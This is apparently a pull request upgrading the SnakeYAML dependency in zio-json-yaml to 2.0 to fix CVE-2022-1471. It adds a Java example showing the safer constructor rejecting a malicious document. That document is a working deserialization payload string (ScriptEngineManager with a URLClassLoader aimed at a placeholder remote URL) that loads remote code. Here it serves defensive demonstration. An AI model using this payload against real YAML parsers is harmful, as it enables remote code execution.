Update snakeyaml dependency to 2.0 #974
Merged
Related to #973
snakeyaml 1.33 is vulnerable to CVE-2022-1471, which has a severity of high or critical depending on the analysis https://nvd.nist.gov/vuln/detail/CVE-2022-1471
zio-json-yaml uses the vulnerable constructor, but 2.0 fixes the issue: https://www.veracode.com/blog/research/resolving-cve-2022-1471-snakeyaml-20-release-0
2.0 removes the deprecated constructor of the SafeConstructor class, so we should use another one, with a default LoaderOptions, like the previous constructor (diff of the old constructor: https://bitbucket.org/snakeyaml/snakeyaml/diff/src/main/java/org/yaml/snakeyaml/constructor/SafeConstructor.java?at=master&diff2=3e755d254aeaa902675053047fd53368a175565a )
I removed the nowarn annotation, because it triggers a warning, since there is no warning anymore (from usage of the deprecated constructor)
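An added example of the constructor change described above, written in Java because SnakeYAML is a Java library; it is not code from zio-json-yaml or from this PR. The class name `SafeConstructorExample` and both YAML documents are assumptions constructed for the example. The API it uses (`LoaderOptions`, `SafeConstructor(LoaderOptions)`, `Yaml.load`) is SnakeYAML 2.0's; the tagged document shows what `SafeConstructor` refuses, which is the class-instantiation pattern behind CVE-2022-1471.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

/** Hypothetical class name; not part of zio-json-yaml. */
public class SafeConstructorExample {

    // Constructed sample input: a document that uses a global (!!) tag to ask the
    // loader to instantiate an arbitrary JVM class, the CVE-2022-1471 pattern.
    static final String TAGGED_DOC =
        "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
        + "[[!!java.net.URL [\"http://example.invalid/\"]]]]";

    // Constructed sample input: ordinary data, which SafeConstructor handles.
    static final String PLAIN_DOC = "name: zio-json-yaml\nversion: 2\n";

    /** Replacement for the no-arg SafeConstructor() removed in 2.0: pass a default LoaderOptions. */
    static Yaml safeYaml() {
        LoaderOptions options = new LoaderOptions(); // defaults, as the old no-arg constructor used
        return new Yaml(new SafeConstructor(options));
    }

    /** Returns the parsed map for PLAIN_DOC. */
    static Map<String, Object> loadPlain() {
        return safeYaml().load(PLAIN_DOC);
    }

    /** Returns true when SafeConstructor refuses the tagged document instead of instantiating the class. */
    static boolean rejectsTaggedDocument() {
        try {
            safeYaml().load(TAGGED_DOC);
            return false;
        } catch (YAMLException e) {
            // SafeConstructor has no constructor registered for arbitrary global tags,
            // so loading fails (ConstructorException) before any class is instantiated.
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("plain: " + loadPlain());
        System.out.println("tagged document rejected: " + rejectsTaggedDocument());
    }
}
```

Run it against the `org.yaml:snakeyaml:2.0` artifact; the plain document loads as a map, and the tagged document fails with a `YAMLException` rather than creating a `ScriptEngineManager`. Keeping a `LoaderOptions` instance in one place also gives you somewhere to tighten limits later (for example `setAllowDuplicateKeys` or `setMaxAliasesForCollections`), which the removed no-arg constructor did not allow.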